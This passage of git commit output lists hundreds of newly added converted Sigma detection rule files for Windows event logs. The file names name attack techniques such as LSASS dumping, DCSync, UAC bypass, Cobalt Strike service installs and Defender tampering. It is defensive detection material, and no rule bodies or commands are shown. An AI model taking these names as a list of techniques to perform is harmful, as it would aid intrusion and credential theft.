tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_outlook_homepage.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_search_order.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_xll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_in_run_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_servicedll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_services_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_sip_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_special_accounts.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_printer_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_service_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_taskcache_entry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_telemetry_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_treatas_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_eventvwr.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_access_token_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_admin_rdp_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_overpass_the_hash.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_pass_the_hash_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_rdp_localhost_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_failed_logon_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_logon_newcredentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_rottenpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/account_management/win_security_susp_wmi_login.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_account_backdoor_dcsync_rights.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_object_writedac_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_replication_non_machine_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_ad_user_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_add_remove_computer.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_admin_share_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_active_directory_user_control.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_ad_user_backdoors.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_enable_weak_encryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_alert_ruler.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_atsvc_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_audit_log_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_camera_microphone_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_codeintegrity_check_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dcsync.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_device_installation_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_disable_event_auditing.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_disable_event_auditing_critical.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_external_device.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_gpo_scheduledtasks.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hidden_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hktl_nofilter.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_impacket_psexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_impacket_secretdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_var_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_iso_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_lm_namedpipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_lsass_access_non_system_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_mal_wceaux_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_metasploit_authentication.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_not_allowed_rdp_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_password_policy_enumerated.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_pcap_drivers.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_petitpotam_network_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_petitpotam_susp_tgt_request.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_possible_dc_shadow.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_protected_storage_service_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_rdp_reverse_tunnel.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_register_new_logon_process_by_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_registry_permissions_weakness_check.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_replay_attack_detected.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_sam_registry_hive_handle_request.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_scm_database_handle_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_scm_database_privileged_operation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_service_install_remote_access_software.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_service_installation_by_unusal_client.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_smb_file_creation_admin_shares.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_add_domain_trust.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_add_sid_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_computer_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_dsrm_password_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_failed_logon_reasons.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_kerberos_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_ldap_dataexchange.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_local_anon_logon_created.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_logon_explicit_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_lsass_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_lsass_dump_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_net_recon_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_outbound_kerberos_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_possible_shadow_credentials_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_psexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_raccess_sensitive_fext.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_rc4_kerberos.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_scheduled_task_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_sdelete.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_susp_time_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_svcctl_remote_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_syskey_registry_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_sysmon_channel_reference_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_tap_driver_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_teams_suspicious_objectaccess.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_added_to_local_administrators.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_user_logoff.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_vssaudit_secevent_source_registration.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_write_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/security/win_security_workstation_was_locked.yml create mode 100644 tools/sigmac/converted_rules/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml create mode 100644 tools/sigmac/converted_rules/builtin/shell_core/win_shell_core_susp_packages_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/application_popup/win_system_application_sysmon_crash.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kernel_general/win_system_quarkspwdump_clearing_hive_access_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_defender_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_hack_smbexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_moriya_rootkit.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_anydesk.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_hacktools.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remcom.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sliver.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml create mode 100644 